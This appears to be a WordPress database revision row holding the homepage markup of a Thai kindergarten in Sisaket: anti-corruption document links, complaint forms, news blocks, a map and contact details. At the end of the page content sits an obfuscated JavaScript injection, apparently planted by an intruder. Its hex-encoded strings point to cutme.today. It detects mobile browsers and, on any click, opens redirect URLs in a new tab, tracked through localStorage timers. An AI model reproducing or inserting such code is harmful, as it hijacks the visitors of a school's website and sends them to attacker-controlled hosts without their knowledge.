800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:37:06','2024-09-24 03:37:06','',19,'http://watprato.ssk.in.th/?p=407',0,'revision','',0),
